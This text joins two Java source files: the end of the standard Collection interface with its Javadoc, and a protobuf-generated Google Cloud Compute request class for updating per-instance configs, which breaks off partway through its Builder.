null */ <T> T[] toArray(T[] a); /** * Returns an array containing all of the elements in this collection, * using the provided {@code generator} function to allocate the returned array. * * <p>If this collection makes any guarantees as to what order its elements * are returned by its iterator, this method must return the elements in * the same order. * * @apiNote * This method acts as a bridge between array-based and collection-based APIs. * It allows creation of an array of a particular runtime type. Use * {@link #toArray()} to create an array whose runtime type is {@code Object[]}, * or use {@link #toArray(Object[]) toArray(T[])} to reuse an existing array. * * <p>Suppose {@code x} is a collection known to contain only strings. * The following code can be used to dump the collection into a newly * allocated array of {@code String}: * * <pre> * String[] y = x.toArray(String[]::new);</pre> * * @implSpec * The default implementation calls the generator function with zero * and then passes the resulting array to {@link #toArray(Object[]) toArray(T[])}. * * @param <T> the component type of the array to contain the collection * @param generator a function which produces a new array of the desired * type and the provided length * @return an array containing all of the elements in this collection * @throws ArrayStoreException if the runtime type of any element in this * collection is not assignable to the {@linkplain Class#getComponentType * runtime component type} of the generated array * @throws NullPointerException if the generator function is null * @since 11 */ /* J2ObjC removed default <T> T[] toArray(IntFunction<T[]> generator) { return toArray(generator.apply(0)); } */ // Modification Operations /** * Ensures that this collection contains the specified element (optional * operation). Returns {@code true} if this collection changed as a * result of the call. (Returns {@code false} if this collection does * not permit duplicates and already contains the specified element.)<p> * * Collections that support this operation may place limitations on what * elements may be added to this collection. In particular, some * collections will refuse to add {@code null} elements, and others will * impose restrictions on the type of elements that may be added. * Collection classes should clearly specify in their documentation any * restrictions on what elements may be added.<p> * * If a collection refuses to add a particular element for any reason * other than that it already contains the element, it <i>must</i> throw * an exception (rather than returning {@code false}). This preserves * the invariant that a collection always contains the specified element * after this call returns. * * @param e element whose presence in this collection is to be ensured * @return {@code true} if this collection changed as a result of the * call * @throws UnsupportedOperationException if the {@code add} operation * is not supported by this collection * @throws ClassCastException if the class of the specified element * prevents it from being added to this collection * @throws NullPointerException if the specified element is null and this * collection does not permit null elements * @throws IllegalArgumentException if some property of the element * prevents it from being added to this collection * @throws IllegalStateException if the element cannot be added at this * time due to insertion restrictions */ boolean add(E e); /** * Removes a single instance of the specified element from this * collection, if it is present (optional operation). More formally, * removes an element {@code e} such that * {@code Objects.equals(o, e)}, if * this collection contains one or more such elements. Returns * {@code true} if this collection contained the specified element (or * equivalently, if this collection changed as a result of the call). * * @param o element to be removed from this collection, if present * @return {@code true} if an element was removed as a result of this call * @throws ClassCastException if the type of the specified element * is incompatible with this collection * (<a href="#optional-restrictions">optional</a>) * @throws NullPointerException if the specified element is null and this * collection does not permit null elements * (<a href="#optional-restrictions">optional</a>) * @throws UnsupportedOperationException if the <tt>remove</tt> operation * is not supported by this collection */ boolean remove(Object o); // Bulk Operations /** * Returns {@code true} if this collection contains all of the elements * in the specified collection. * * @param c collection to be checked for containment in this collection * @return {@code true} if this collection contains all of the elements * in the specified collection * @throws ClassCastException if the types of one or more elements * in the specified collection are incompatible with this * collection * (<a href="#optional-restrictions">optional</a>) * @throws NullPointerException if the specified collection contains one * or more null elements and this collection does not permit null * elements * (<a href="#optional-restrictions">optional</a>), * or if the specified collection is null. * @see #contains(Object) */ boolean containsAll(Collection<?> c); /** * Adds all of the elements in the specified collection to this collection * (optional operation). The behavior of this operation is undefined if * the specified collection is modified while the operation is in progress. * (This implies that the behavior of this call is undefined if the * specified collection is this collection, and this collection is * nonempty.) * * @param c collection containing elements to be added to this collection * @return {@code true} if this collection changed as a result of the call * @throws UnsupportedOperationException if the {@code addAll} operation * is not supported by this collection * @throws ClassCastException if the class of an element of the specified * collection prevents it from being added to this collection * @throws NullPointerException if the specified collection contains a * null element and this collection does not permit null elements, * or if the specified collection is null * @throws IllegalArgumentException if some property of an element of the * specified collection prevents it from being added to this * collection * @throws IllegalStateException if not all the elements can be added at * this time due to insertion restrictions * @see #add(Object) */ boolean addAll(Collection<? extends E> c); /** * Removes all of this collection's elements that are also contained in the * specified collection (optional operation). After this call returns, * this collection will contain no elements in common with the specified * collection. * * @param c collection containing elements to be removed from this collection * @return {@code true} if this collection changed as a result of the * call * @throws UnsupportedOperationException if the {@code removeAll} method * is not supported by this collection * @throws ClassCastException if the types of one or more elements * in this collection are incompatible with the specified * collection * (<a href="#optional-restrictions">optional</a>) * @throws NullPointerException if this collection contains one or more * null elements and the specified collection does not support * null elements * (<a href="#optional-restrictions">optional</a>), * or if the specified collection is null * @see #remove(Object) * @see #contains(Object) */ boolean removeAll(Collection<?> c); /** * Removes all of the elements of this collection that satisfy the given * predicate. Errors or runtime exceptions thrown during iteration or by * the predicate are relayed to the caller. * * @implSpec * The default implementation traverses all elements of the collection using * its {@link #iterator}. Each matching element is removed using * {@link Iterator#remove()}. If the collection's iterator does not * support removal then an {@code UnsupportedOperationException} will be * thrown on the first matching element. * * @param filter a predicate which returns {@code true} for elements to be * removed * @return {@code true} if any elements were removed * @throws NullPointerException if the specified filter is null * @throws UnsupportedOperationException if elements cannot be removed * from this collection. Implementations may throw this exception if a * matching element cannot be removed or if, in general, removal is not * supported. * @since 1.8 */ default boolean removeIf(Predicate<? super E> filter) { Objects.requireNonNull(filter); boolean removed = false; final Iterator<E> each = iterator(); while (each.hasNext()) { if (filter.test(each.next())) { each.remove(); removed = true; } } return removed; } /** * Retains only the elements in this collection that are contained in the * specified collection (optional operation). In other words, removes from * this collection all of its elements that are not contained in the * specified collection. * * @param c collection containing elements to be retained in this collection * @return {@code true} if this collection changed as a result of the call * @throws UnsupportedOperationException if the {@code retainAll} operation * is not supported by this collection * @throws ClassCastException if the types of one or more elements * in this collection are incompatible with the specified * collection * (<a href="#optional-restrictions">optional</a>) * @throws NullPointerException if this collection contains one or more * null elements and the specified collection does not permit null * elements * (<a href="#optional-restrictions">optional</a>), * or if the specified collection is null * @see #remove(Object) * @see #contains(Object) */ boolean retainAll(Collection<?> c); /** * Removes all of the elements from this collection (optional operation). * The collection will be empty after this method returns. * * @throws UnsupportedOperationException if the {@code clear} operation * is not supported by this collection */ void clear(); // Comparison and hashing /** * Compares the specified object with this collection for equality. <p> * * While the {@code Collection} interface adds no stipulations to the * general contract for the {@code Object.equals}, programmers who * implement the {@code Collection} interface "directly" (in other words, * create a class that is a {@code Collection} but is not a {@code Set} * or a {@code List}) must exercise care if they choose to override the * {@code Object.equals}. It is not necessary to do so, and the simplest * course of action is to rely on {@code Object}'s implementation, but * the implementor may wish to implement a "value comparison" in place of * the default "reference comparison." (The {@code List} and * {@code Set} interfaces mandate such value comparisons.)<p> * * The general contract for the {@code Object.equals} method states that * equals must be symmetric (in other words, {@code a.equals(b)} if and * only if {@code b.equals(a)}). The contracts for {@code List.equals} * and {@code Set.equals} state that lists are only equal to other lists, * and sets to other sets. Thus, a custom {@code equals} method for a * collection class that implements neither the {@code List} nor * {@code Set} interface must return {@code false} when this collection * is compared to any list or set. (By the same logic, it is not possible * to write a class that correctly implements both the {@code Set} and * {@code List} interfaces.) * * @param o object to be compared for equality with this collection * @return {@code true} if the specified object is equal to this * collection * * @see Object#equals(Object) * @see Set#equals(Object) * @see List#equals(Object) */ boolean equals(Object o); /** * Returns the hash code value for this collection. While the * {@code Collection} interface adds no stipulations to the general * contract for the {@code Object.hashCode} method, programmers should * take note that any class that overrides the {@code Object.equals} * method must also override the {@code Object.hashCode} method in order * to satisfy the general contract for the {@code Object.hashCode} method. * In particular, {@code c1.equals(c2)} implies that * {@code c1.hashCode()==c2.hashCode()}. * * @return the hash code value for this collection * * @see Object#hashCode() * @see Object#equals(Object) */ int hashCode(); /** * Creates a {@link Spliterator} over the elements in this collection. * * Implementations should document characteristic values reported by the * spliterator. Such characteristic values are not required to be reported * if the spliterator reports {@link Spliterator#SIZED} and this collection * contains no elements. * * <p>The default implementation should be overridden by subclasses that * can return a more efficient spliterator. In order to * preserve expected laziness behavior for the {@link #stream()} and * {@link #parallelStream()} methods, spliterators should either have the * characteristic of {@code IMMUTABLE} or {@code CONCURRENT}, or be * <em><a href="Spliterator.html#binding">late-binding</a></em>. * If none of these is practical, the overriding class should describe the * spliterator's documented policy of binding and structural interference, * and should override the {@link #stream()} and {@link #parallelStream()} * methods to create streams using a {@code Supplier} of the spliterator, * as in: * <pre>{@code * Stream<E> s = StreamSupport.stream(() -> spliterator(), spliteratorCharacteristics) * }</pre> * <p>These requirements ensure that streams produced by the * {@link #stream()} and {@link #parallelStream()} methods will reflect the * contents of the collection as of initiation of the terminal stream * operation. * * @implSpec * The default implementation creates a * <em><a href="Spliterator.html#binding">late-binding</a></em> spliterator * from the collection's {@code Iterator}. The spliterator inherits the * <em>fail-fast</em> properties of the collection's iterator. * <p> * The created {@code Spliterator} reports {@link Spliterator#SIZED}. * * @implNote * The created {@code Spliterator} additionally reports * {@link Spliterator#SUBSIZED}. * * <p>If a spliterator covers no elements then the reporting of additional * characteristic values, beyond that of {@code SIZED} and {@code SUBSIZED}, * does not aid clients to control, specialize or simplify computation. * However, this does enable shared use of an immutable and empty * spliterator instance (see {@link Spliterators#emptySpliterator()}) for * empty collections, and enables clients to determine if such a spliterator * covers no elements. * * @return a {@code Spliterator} over the elements in this collection * @since 1.8 */ @Override default Spliterator<E> spliterator() { return Spliterators.spliterator(this, 0); } /** * Returns a sequential {@code Stream} with this collection as its source. * * <p>This method should be overridden when the {@link #spliterator()} * method cannot return a spliterator that is {@code IMMUTABLE}, * {@code CONCURRENT}, or <em>late-binding</em>. (See {@link #spliterator()} * for details.) * * @implSpec * The default implementation creates a sequential {@code Stream} from the * collection's {@code Spliterator}. * * @return a sequential {@code Stream} over the elements in this collection * @since 1.8 */ default Stream<E> stream() { return StreamSupport.stream(spliterator(), false); } /** * Returns a possibly parallel {@code Stream} with this collection as its * source. It is allowable for this method to return a sequential stream. * * <p>This method should be overridden when the {@link #spliterator()} * method cannot return a spliterator that is {@code IMMUTABLE}, * {@code CONCURRENT}, or <em>late-binding</em>. (See {@link #spliterator()} * for details.) * * @implSpec * The default implementation creates a parallel {@code Stream} from the * collection's {@code Spliterator}. * * @return a possibly parallel {@code Stream} over the elements in this * collection * @since 1.8 */ default Stream<E> parallelStream() { return StreamSupport.stream(spliterator(), true); } }
googleapis/google-cloud-java
35,885
java-compute/proto-google-cloud-compute-v1/src/main/java/com/google/cloud/compute/v1/InstanceGroupManagersUpdatePerInstanceConfigsReq.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/cloud/compute/v1/compute.proto // Protobuf Java Version: 3.25.8 package com.google.cloud.compute.v1; /** * * * <pre> * InstanceGroupManagers.updatePerInstanceConfigs * </pre> * * Protobuf type {@code google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq} */ public final class InstanceGroupManagersUpdatePerInstanceConfigsReq extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq) InstanceGroupManagersUpdatePerInstanceConfigsReqOrBuilder { private static final long serialVersionUID = 0L; // Use InstanceGroupManagersUpdatePerInstanceConfigsReq.newBuilder() to construct. private InstanceGroupManagersUpdatePerInstanceConfigsReq( com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private InstanceGroupManagersUpdatePerInstanceConfigsReq() { perInstanceConfigs_ = java.util.Collections.emptyList(); } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new InstanceGroupManagersUpdatePerInstanceConfigsReq(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.compute.v1.Compute .internal_static_google_cloud_compute_v1_InstanceGroupManagersUpdatePerInstanceConfigsReq_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.compute.v1.Compute .internal_static_google_cloud_compute_v1_InstanceGroupManagersUpdatePerInstanceConfigsReq_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq.class, com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq.Builder .class); } public static final int PER_INSTANCE_CONFIGS_FIELD_NUMBER = 526265001; @SuppressWarnings("serial") private java.util.List<com.google.cloud.compute.v1.PerInstanceConfig> perInstanceConfigs_; /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ @java.lang.Override public java.util.List<com.google.cloud.compute.v1.PerInstanceConfig> getPerInstanceConfigsList() { return perInstanceConfigs_; } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ @java.lang.Override public java.util.List<? extends com.google.cloud.compute.v1.PerInstanceConfigOrBuilder> getPerInstanceConfigsOrBuilderList() { return perInstanceConfigs_; } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ @java.lang.Override public int getPerInstanceConfigsCount() { return perInstanceConfigs_.size(); } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ @java.lang.Override public com.google.cloud.compute.v1.PerInstanceConfig getPerInstanceConfigs(int index) { return perInstanceConfigs_.get(index); } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ @java.lang.Override public com.google.cloud.compute.v1.PerInstanceConfigOrBuilder getPerInstanceConfigsOrBuilder( int index) { return perInstanceConfigs_.get(index); } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { for (int i = 0; i < perInstanceConfigs_.size(); i++) { output.writeMessage(526265001, perInstanceConfigs_.get(i)); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; for (int i = 0; i < perInstanceConfigs_.size(); i++) { size += com.google.protobuf.CodedOutputStream.computeMessageSize( 526265001, perInstanceConfigs_.get(i)); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq)) { return super.equals(obj); } com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq other = (com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq) obj; if (!getPerInstanceConfigsList().equals(other.getPerInstanceConfigsList())) return false; if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); if (getPerInstanceConfigsCount() > 0) { hash = (37 * hash) + PER_INSTANCE_CONFIGS_FIELD_NUMBER; hash = (53 * hash) + getPerInstanceConfigsList().hashCode(); } hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq parseFrom(java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq parseFrom(com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq parseFrom(byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq parseFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq parseDelimitedFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq parseFrom(com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder( com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * * * <pre> * InstanceGroupManagers.updatePerInstanceConfigs * </pre> * * Protobuf type {@code google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq) com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReqOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.compute.v1.Compute .internal_static_google_cloud_compute_v1_InstanceGroupManagersUpdatePerInstanceConfigsReq_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.compute.v1.Compute .internal_static_google_cloud_compute_v1_InstanceGroupManagersUpdatePerInstanceConfigsReq_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq.class, com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq.Builder .class); } // Construct using // com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq.newBuilder() private Builder() {} private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; if (perInstanceConfigsBuilder_ == null) { perInstanceConfigs_ = java.util.Collections.emptyList(); } else { perInstanceConfigs_ = null; perInstanceConfigsBuilder_.clear(); } bitField0_ = (bitField0_ & ~0x00000001); return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.cloud.compute.v1.Compute .internal_static_google_cloud_compute_v1_InstanceGroupManagersUpdatePerInstanceConfigsReq_descriptor; } @java.lang.Override public com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq getDefaultInstanceForType() { return com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq .getDefaultInstance(); } @java.lang.Override public com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq build() { com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq buildPartial() { com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq result = new com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq(this); buildPartialRepeatedFields(result); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartialRepeatedFields( com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq result) { if (perInstanceConfigsBuilder_ == null) { if (((bitField0_ & 0x00000001) != 0)) { perInstanceConfigs_ = java.util.Collections.unmodifiableList(perInstanceConfigs_); bitField0_ = (bitField0_ & ~0x00000001); } result.perInstanceConfigs_ = perInstanceConfigs_; } else { result.perInstanceConfigs_ = perInstanceConfigsBuilder_.build(); } } private void buildPartial0( com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq result) { int from_bitField0_ = bitField0_; } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq) { return mergeFrom( (com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq) other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom( com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq other) { if (other == com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq .getDefaultInstance()) return this; if (perInstanceConfigsBuilder_ == null) { if (!other.perInstanceConfigs_.isEmpty()) { if (perInstanceConfigs_.isEmpty()) { perInstanceConfigs_ = other.perInstanceConfigs_; bitField0_ = (bitField0_ & ~0x00000001); } else { ensurePerInstanceConfigsIsMutable(); perInstanceConfigs_.addAll(other.perInstanceConfigs_); } onChanged(); } } else { if (!other.perInstanceConfigs_.isEmpty()) { if (perInstanceConfigsBuilder_.isEmpty()) { perInstanceConfigsBuilder_.dispose(); perInstanceConfigsBuilder_ = null; perInstanceConfigs_ = other.perInstanceConfigs_; bitField0_ = (bitField0_ & ~0x00000001); perInstanceConfigsBuilder_ = com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders ? getPerInstanceConfigsFieldBuilder() : null; } else { perInstanceConfigsBuilder_.addAllMessages(other.perInstanceConfigs_); } } } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case -84847286: { com.google.cloud.compute.v1.PerInstanceConfig m = input.readMessage( com.google.cloud.compute.v1.PerInstanceConfig.parser(), extensionRegistry); if (perInstanceConfigsBuilder_ == null) { ensurePerInstanceConfigsIsMutable(); perInstanceConfigs_.add(m); } else { perInstanceConfigsBuilder_.addMessage(m); } break; } // case -84847286 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private java.util.List<com.google.cloud.compute.v1.PerInstanceConfig> perInstanceConfigs_ = java.util.Collections.emptyList(); private void ensurePerInstanceConfigsIsMutable() { if (!((bitField0_ & 0x00000001) != 0)) { perInstanceConfigs_ = new java.util.ArrayList<com.google.cloud.compute.v1.PerInstanceConfig>( perInstanceConfigs_); bitField0_ |= 0x00000001; } } private com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloud.compute.v1.PerInstanceConfig, com.google.cloud.compute.v1.PerInstanceConfig.Builder, com.google.cloud.compute.v1.PerInstanceConfigOrBuilder> perInstanceConfigsBuilder_; /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public java.util.List<com.google.cloud.compute.v1.PerInstanceConfig> getPerInstanceConfigsList() { if (perInstanceConfigsBuilder_ == null) { return java.util.Collections.unmodifiableList(perInstanceConfigs_); } else { return perInstanceConfigsBuilder_.getMessageList(); } } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public int getPerInstanceConfigsCount() { if (perInstanceConfigsBuilder_ == null) { return perInstanceConfigs_.size(); } else { return perInstanceConfigsBuilder_.getCount(); } } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public com.google.cloud.compute.v1.PerInstanceConfig getPerInstanceConfigs(int index) { if (perInstanceConfigsBuilder_ == null) { return perInstanceConfigs_.get(index); } else { return perInstanceConfigsBuilder_.getMessage(index); } } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public Builder setPerInstanceConfigs( int index, com.google.cloud.compute.v1.PerInstanceConfig value) { if (perInstanceConfigsBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensurePerInstanceConfigsIsMutable(); perInstanceConfigs_.set(index, value); onChanged(); } else { perInstanceConfigsBuilder_.setMessage(index, value); } return this; } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public Builder setPerInstanceConfigs( int index, com.google.cloud.compute.v1.PerInstanceConfig.Builder builderForValue) { if (perInstanceConfigsBuilder_ == null) { ensurePerInstanceConfigsIsMutable(); perInstanceConfigs_.set(index, builderForValue.build()); onChanged(); } else { perInstanceConfigsBuilder_.setMessage(index, builderForValue.build()); } return this; } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public Builder addPerInstanceConfigs(com.google.cloud.compute.v1.PerInstanceConfig value) { if (perInstanceConfigsBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensurePerInstanceConfigsIsMutable(); perInstanceConfigs_.add(value); onChanged(); } else { perInstanceConfigsBuilder_.addMessage(value); } return this; } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public Builder addPerInstanceConfigs( int index, com.google.cloud.compute.v1.PerInstanceConfig value) { if (perInstanceConfigsBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensurePerInstanceConfigsIsMutable(); perInstanceConfigs_.add(index, value); onChanged(); } else { perInstanceConfigsBuilder_.addMessage(index, value); } return this; } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public Builder addPerInstanceConfigs( com.google.cloud.compute.v1.PerInstanceConfig.Builder builderForValue) { if (perInstanceConfigsBuilder_ == null) { ensurePerInstanceConfigsIsMutable(); perInstanceConfigs_.add(builderForValue.build()); onChanged(); } else { 